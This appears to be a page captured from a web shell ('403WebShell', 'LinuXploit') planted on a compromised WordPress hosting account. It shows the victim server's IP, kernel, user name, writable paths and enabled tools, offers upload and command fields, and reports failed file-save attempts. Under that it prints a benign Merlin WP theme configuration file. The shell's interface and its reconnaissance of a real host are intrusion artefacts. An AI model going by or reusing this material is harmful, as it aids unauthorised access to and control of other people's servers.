Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.15.91
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/themes/meto/demo-import/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/themes/meto/demo-import/merlin-config.php
<?php
/**
 * Merlin WP configuration file.
 *
 * @package   Merlin WP
 * @version   @@pkg.version
 * @link      https://merlinwp.com/
 * @author    Rich Tabor, from ThemeBeans.com & the team at ProteusThemes.com
 * @copyright Copyright (c) 2018, Merlin WP of Inventionn LLC
 * @license   Licensed GPLv3 for Open Source Use
 */

if (! class_exists('Merlin')) {
    return;
}

defined('EXPERTS_IMPORT_VENDOR_PATH') || define('EXPERTS_IMPORT_VENDOR_PATH', get_template_directory() . '/demo-import/vendor/');

require_once EXPERTS_IMPORT_VENDOR_PATH . 'autoload.php';

if (! class_exists('\WP_Importer')) {
    require ABSPATH . '/wp-admin/includes/class-wp-importer.php';
}
require_once get_template_directory() . '/demo-import/importer/WPImporterLogger.php';
require_once get_template_directory() . '/demo-import/importer/WPImporterLoggerCLI.php';
require_once get_template_directory() . '/demo-import/importer/WXRImportInfo.php';
require_once get_template_directory() . '/demo-import/importer/WXRImporter.php';
require_once get_template_directory() . '/demo-import/importer/Importer.php';
/**
 * Set directory locations, text strings, and settings.
 */
$wizard = new Merlin(
    $config = array(
        'directory'            => 'demo-import',
        // Location / directory where Merlin WP is placed in your theme.
        'merlin_url'           => 'demo-import',
        // The wp-admin page slug where Merlin WP loads.
        'parent_slug'          => 'themes.php',
        // The wp-admin parent page slug for the admin menu item.
        'capability'           => 'manage_options',
        // The capability required for this menu to be displayed to the user.
        'child_action_btn_url' => 'https://codex.wordpress.org/child_themes',
        // URL for the 'child-action-link'.
        'dev_mode'             => true,
        // Enable development mode for testing.
        'license_step'         => false,
        // EDD license activation step.
        'license_required'     => false,
        // Require the license activation step.
        'license_help_url'     => '',
        // URL for the 'license-tooltip'.
        'edd_remote_api_url'   => '',
        // EDD_Theme_Updater_Admin remote_api_url.
        'edd_item_name'        => 'meto',
        // EDD_Theme_Updater_Admin item_name.
        'edd_theme_slug'       => 'meto',
        // EDD_Theme_Updater_Admin item_slug.
        'ready_big_button_url' => home_url('/'),
        // Link for the big button on the ready step.
    ),
    $strings = array(
        'admin-menu'          => esc_html__('Meto Demo Import', 'meto'),

        /* translators: 1: Title Tag 2: Theme Name 3: Closing Title Tag */
        'title%s%s%s%s'       => esc_html__('%1$s%2$s Themes &lsaquo; Theme Setup: %3$s%4$s', 'meto'),
        'return-to-dashboard' => esc_html__('Return to the dashboard', 'meto'),
        'ignore'              => esc_html__('Disable this wizard', 'meto'),

        'btn-skip'                 => esc_html__('Skip', 'meto'),
        'btn-next'                 => esc_html__('Next', 'meto'),
        'btn-start'                => esc_html__('Start', 'meto'),
        'btn-no'                   => esc_html__('Cancel', 'meto'),
        'btn-plugins-install'      => esc_html__('Install', 'meto'),
        'btn-child-install'        => esc_html__('Install', 'meto'),
        'btn-content-install'      => esc_html__('Install', 'meto'),
        'btn-import'               => esc_html__('Import', 'meto'),
        'btn-license-activate'     => esc_html__('Activate', 'meto'),
        'btn-license-skip'         => esc_html__('Later', 'meto'),

        /* translators: Theme Name */
        'license-header%s'         => esc_html__('Activate %s', 'meto'),
        /* translators: Theme Name */
        'license-header-success%s' => esc_html__('%s is Activated', 'meto'),
        /* translators: Theme Name */
        'license%s'                => esc_html__('Enter your license key to enable remote updates and theme support.', 'meto'),
        'license-label'            => esc_html__('License key', 'meto'),
        'license-success%s'        => esc_html__('The theme is already registered, so you can go to the next step!', 'meto'),
        'license-json-success%s'   => esc_html__('Your theme is activated! Remote updates and theme support are enabled.', 'meto'),
        'license-tooltip'          => esc_html__('Need help?', 'meto'),

        /* translators: Theme Name */
        'welcome-header%s'         => esc_html__('Welcome to %s', 'meto'),
        'welcome-header-success%s' => esc_html__('Hi. Welcome back', 'meto'),
        'welcome%s'                => esc_html__('This wizard will set up your theme, install plugins, and import content. It is optional & should take only a few minutes.', 'meto'),
        'welcome-success%s'        => esc_html__('You may have already run this theme setup wizard. If you would like to proceed anyway, click on the "Start" button below.', 'meto'),

        'child-header'         => esc_html__('Install Child Theme', 'meto'),
        'child-header-success' => esc_html__('You\'re good to go!', 'meto'),
        'child'                => esc_html__('Let\'s build & activate a child theme so you may easily make theme changes.', 'meto'),
        'child-success%s'      => esc_html__('Your child theme has already been installed and is now activated, if it wasn\'t already.', 'meto'),
        'child-action-link'    => esc_html__('Learn about child themes', 'meto'),
        'child-json-success%s' => esc_html__('Awesome. Your child theme has already been installed and is now activated.', 'meto'),
        'child-json-already%s' => esc_html__('Awesome. Your child theme has been created and is now activated.', 'meto'),

        'plugins-header'         => esc_html__('Install Plugins', 'meto'),
        'plugins-header-success' => esc_html__('You\'re up to speed!', 'meto'),
        'plugins'                => esc_html__('Let\'s install some essential WordPress plugins to get your site up to speed.', 'meto'),
        'plugins-success%s'      => esc_html__('The required WordPress plugins are all installed and up to date. Press "Next" to continue the setup wizard.', 'meto'),
        'plugins-action-link'    => esc_html__('Advanced', 'meto'),

        'import-header'      => esc_html__('Import Content', 'meto'),
        'import'             => esc_html__('Let\'s import content to your website, to help you get familiar with the theme.', 'meto'),
        'import-action-link' => esc_html__('Advanced', 'meto'),

        'ready-header'      => esc_html__('All done. Have fun!', 'meto'),

        /* translators: Theme Author */
        'ready%s'           => esc_html__('Your theme has been all set up. Enjoy your new theme by %s.', 'meto'),
        'ready-action-link' => esc_html__('Extras', 'meto'),
        'ready-big-button'  => esc_html__('View your website', 'meto'),
        'ready-link-1'      => sprintf('<a href="%1$s" target="_blank">%2$s</a>', 'https://themeforest.net/user/expert-themes', esc_html__('5 Star For Project Meto', 'meto')),
        'ready-link-2'      => sprintf('<a href="%1$s" target="_blank">%2$s</a>', 'https://expert-themes.com/support', esc_html__('Get Meto Theme Support', 'meto')),
    )
);

Youez - 2016 - github.com/yon3zu
LinuXploit